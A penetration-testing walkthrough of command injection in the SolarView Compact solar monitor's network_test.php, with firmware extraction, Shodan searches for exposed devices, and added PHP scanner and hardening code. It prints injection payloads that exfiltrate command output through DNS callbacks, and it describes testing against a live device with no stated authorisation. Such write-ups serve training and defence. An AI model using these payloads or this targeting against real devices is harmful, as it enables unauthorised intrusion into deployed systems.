Remote Code Execution on SolarView Compact Firmware: A Technical Walkthrough
Introduction
Remote system management plays a crucial role in today's connected environments, enabling real-time monitoring and control of firmware-based products through web interfaces. In this post we describe how we achieved Remote Code Execution (RCE) against the embedded web server of a solar monitoring product, the SolarView Compact. The walkthrough covers four stages: Firmware Extraction, Reconnaissance, Code Review, and Exploitation, and is intended both for internal knowledge-sharing and for training future penetration testers.
1. Analysis and Firmware Extraction
The target product is the SolarView Compact, a device designed to monitor solar power systems. At the time of testing the firmware version was 7.00, and from the vendor website we downloaded the corresponding update file, svcUpdate700.fpk.
💡 Manufacturers often distribute firmware updates as .fpk files that are uploaded to the device to perform the update. These files typically contain the core firmware code, along with the metadata and instructions needed to apply the update properly.
Knowing that .fpk is a firmware package format, the next step is to extract its contents. Binwalk is well suited to this task: running binwalk -Me <file-name> carves out every file system and archive it recognises and recursively extracts them, which gave us the unpacked firmware files.
Among the extracted directories, the html folder stood out: it contains the web interface, which makes it a promising initial attack surface.
2. Reconnaissance
The html directory contains numerous files worth reviewing.
Before diving into the code, however, it is essential to determine where the corresponding web server is exposed on the internet. Identifying vulnerabilities in the code is only meaningful if they can be applied to a live target, and this is where reconnaissance becomes critical.
We began with index.html, the main page, since it is likely to contain product-specific strings. Within it we found an anchor tag linking to Solar_Menu.php.
To locate live instances we used Shodan, a search engine for internet-exposed hardware and IoT devices, querying with the http.html filter for strings taken from the extracted pages.
The query returned several web servers, but their Last-Modified headers indicated that most were running older versions. To stay consistent with the code we had extracted we needed a more recent instance. We also noticed that every page carried a copyright footer, a detail that could be used to refine the search.
Refining the Shodan query with the footer text and a recent date should surface an active, up-to-date server.
This worked: we identified a recently updated web server that matches the extracted code.
3. Code Review
Manually reviewing every file would be time-consuming, so we took a targeted approach. Since the server runs PHP, the obvious sinks are eval, system and exec, but these are well known and have most likely been scrutinised already.
Instead, we focused on less common functions such as passthru(), which also runs a system command and streams its raw output straight back to the client.
In network_test.php, the host parameter is accepted without sanitisation and concatenated directly into nslookup and ping commands, which are then run through a passthru() call. Because the parameter reaches the shell unmodified, the page is vulnerable to command injection and therefore to Remote Code Execution (RCE).
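The targeted review described above can be scripted. The following is an added example, not code from the original post or from the SolarView firmware: it walks an extracted web root, lists every command-execution sink it finds, and flags the calls whose argument is fed by a request parameter, so that a reviewer starts with the tainted passthru() calls rather than with every file. The sink list, the line-based taint approximation and the two sample files written to a temporary directory are all constructed for the demo.

```php
<?php
declare(strict_types=1);
// Added example, not code from the original post or from the SolarView firmware.
// Triage script for an extracted firmware web root: lists every command
// sink and flags those whose arguments are fed by a request parameter.
// File names and contents used in the demo below are constructed.

/** Command-execution sinks, least common first (passthru is what the post found). */
const SINKS = ['passthru', 'proc_open', 'popen', 'shell_exec', 'exec', 'system'];

/**
 * Scan one PHP source string. Returns [['line'=>int,'sink'=>string,'tainted'=>bool], ...].
 * "Tainted" means the call mentions $_GET/$_POST/$_REQUEST directly, or a variable
 * that was assigned from one of them earlier in the file. This is a deliberately
 * simple, line-based approximation of taint tracking, good enough for triage.
 */
function scanSource(string $src): array
{
    $lines = explode("\n", $src);
    $superglobal = '/\$_(GET|POST|REQUEST)\b/';

    // Pass 1: variables assigned from a request superglobal, e.g. $host = $_GET['host'];
    $taintedVars = [];
    foreach ($lines as $line) {
        if (preg_match('/(\$[A-Za-z_]\w*)\s*=[^=].*\$_(GET|POST|REQUEST)\b/', $line, $m)) {
            $taintedVars[] = $m[1];
        }
    }

    // Pass 2: sink calls, marked tainted if a superglobal or tainted variable is in the statement.
    $sinkRe = '/\b(' . implode('|', SINKS) . ')\s*\(/i';
    $findings = [];
    foreach ($lines as $i => $line) {
        if (!preg_match($sinkRe, $line, $m)) {
            continue;
        }
        $isTainted = (bool) preg_match($superglobal, $line);
        foreach ($taintedVars as $var) {
            if (preg_match('/' . preg_quote($var, '/') . '\b/', $line)) {
                $isTainted = true;
            }
        }
        $findings[] = ['line' => $i + 1, 'sink' => strtolower($m[1]), 'tainted' => $isTainted];
    }
    return $findings;
}

/** Walk a directory tree and scan every .php file; results are keyed by relative path. */
function scanTree(string $root): array
{
    $results = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $findings = scanSource((string) file_get_contents($file->getPathname()));
        if ($findings) {
            $results[substr($file->getPathname(), strlen($root) + 1)] = $findings;
        }
    }
    ksort($results);
    return $results;
}

// Demo: constructed stand-ins for files in an extracted html/ directory.
$root = sys_get_temp_dir() . '/fw_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/network_test.php", implode("\n", [
    '<?php',
    '$host = $_GET["host"];',
    'passthru("nslookup " . $host . "; ping -c 1 " . $host);',
]));
file_put_contents("$root/status.php", implode("\n", [
    '<?php',
    'system("uptime");', // sink with a constant argument: low priority
]));

foreach (scanTree($root) as $path => $findings) {
    foreach ($findings as $f) {
        printf("%-18s line %d  %-10s %s\n",
            $path, $f['line'], $f['sink'], $f['tainted'] ? 'TAINTED' : 'constant argument');
    }
}

// Clean up the constructed tree.
array_map('unlink', glob("$root/*.php"));
rmdir($root);
```

Run it with the PHP CLI against the real extracted html directory by replacing the constructed root; the tainted passthru() in the demo's network_test.php stand-in is exactly the shape that should be read first. Taint is only followed through direct assignments from a superglobal, so an include or a function boundary will hide a flow from this script; it narrows the reading list, it does not replace the manual review.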
4. Exploitation
Accessing network_test.php on the target presented a simple interface with a hostname input field.
Classic command-separator payloads such as ;ls were rejected, since the field expected a valid hostname. However, when we supplied a Burp Collaborator URL as the hostname, we received a DNS callback, confirming that our input reached nslookup and that the command was executed with it.
So how do we turn this into actual code execution? Because the hostname is interpolated into a shell command that passthru() executes, we can embed a command substitution, either backticks (`command`) or $(command), inside the hostname. The shell evaluates the substitution before nslookup runs, so arbitrary commands execute on the server. Their output is not returned to us directly, which makes this blind RCE; we confirmed it through DNS-based callbacks, and because the substitution's output becomes part of the name that nslookup resolves, it can even be read back from the callback's subdomain as long as it contains only hostname-safe characters.
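The following added example (not the SolarView code and not the vendor's fix) reconstructs the vulnerable pattern described in the code review and exploitation sections, a host parameter concatenated into nslookup and ping commands for passthru(), and places a hardened version beside it. The exact command line, the ping -c 1 flag and the COLLAB placeholder for an out-of-band DNS listener such as a Burp Collaborator host are assumptions; the commands are only built as strings and never executed, so the script is safe to run.

```php
<?php
declare(strict_types=1);
// Added example, not the SolarView code and not the vendor's fix. It reconstructs the
// pattern the post describes (a host parameter concatenated into a passthru() call)
// and puts a hardened version beside it. The command line and the "-c 1" flag are
// assumptions. Commands are only built as strings here, never executed.

/** Vulnerable shape: the request parameter reaches the shell unchanged. */
function buildVulnerableCommand(string $host): string
{
    return "nslookup " . $host . "; ping -c 1 " . $host;
}

/**
 * Strict RFC 1123 hostname allow-list: labels of letters, digits and hyphens,
 * 1-63 characters each, not starting or ending with a hyphen, 253 characters total.
 * Dotted IPv4 addresses pass as all-digit labels. Everything a shell could
 * interpret ($ ( ) ` ; | & and whitespace) lies outside this character set.
 */
function isValidHostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return (bool) preg_match('/^' . $label . '(?:\.' . $label . ')*\.?$/', $host);
}

/**
 * Hardened shape: validate against the allow-list first, then quote anyway so the
 * value always reaches the shell as a single word. Returns null when the input is rejected.
 */
function buildHardenedCommand(string $host): ?string
{
    if (!isValidHostname($host)) {
        return null;
    }
    $safe = escapeshellarg($host);
    return "nslookup " . $safe . "; ping -c 1 " . $safe;
}

// Constructed inputs: two legitimate hostnames and the payload shapes discussed in the post.
// COLLAB is a placeholder for an out-of-band DNS listener (e.g. a Burp Collaborator host).
$inputs = [
    'example.com',
    'router-1.lan',
    ';ls',                 // separator payload: not a hostname, rejected
    '`id`.COLLAB',         // backtick command substitution inside the hostname
    '$(whoami).COLLAB',    // $() substitution: the resolved name carries the command output
];

foreach ($inputs as $in) {
    printf("%-20s vulnerable: %s\n", $in, buildVulnerableCommand($in));
    printf("%-20s hardened:   %s\n\n", '', buildHardenedCommand($in) ?? 'REJECTED');
}
```

The vulnerable lines show exactly what the shell receives: for the last two inputs the substitution sits in the middle of the nslookup argument, which is why a DNS callback to COLLAB proves execution. The hardened version rejects those inputs before any command is built, and escapeshellarg() is kept as a second layer in case the allow-list is ever loosened. The better fix is to avoid the shell altogether, for instance resolving the name with dns_get_record() in PHP, so that there is no command string to inject into.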
Mitigation
The vendor mitigated the vulnerability by placing network_test.php behind HTTP Basic Authentication, a simple but effective access-control layer. Note that this restricts who can reach the page rather than removing the injection itself; validating the host parameter before it reaches the shell would close the bug for authenticated users as well.
Key Takeaways
Points of Success:
● Effective Recon: Leveraged Shodan and creative search filters to locate a live, relevant web instance.
● Smart Code Review: Focused on less common functions such as passthru() to identify exploitable code efficiently.
● Confirmed RCE: Successfully triggered blind RCE and confirmed it through DNS-based callbacks.
Points of Limitation:
● Restricted Execution: Payloads built from shell separators and plain commands such as id or ls were blocked, which limited direct testing and left only blind, DNS-confirmed execution.
Lessons Learned
● Firmware Management:
Firmware-based products often include embedded web servers for remote administration. Understanding how the web layer interacts with the underlying system is crucial for identifying security risks.
● Reconnaissance:
Recon is a versatile technique that adapts to many contexts. Here it let us pinpoint a relevant target and validate our findings against a live instance.
● Code Review:
The success of a code review depends on the approach. By focusing on specific, less common PHP functions, we uncovered a critical vulnerability without reading the entire code base.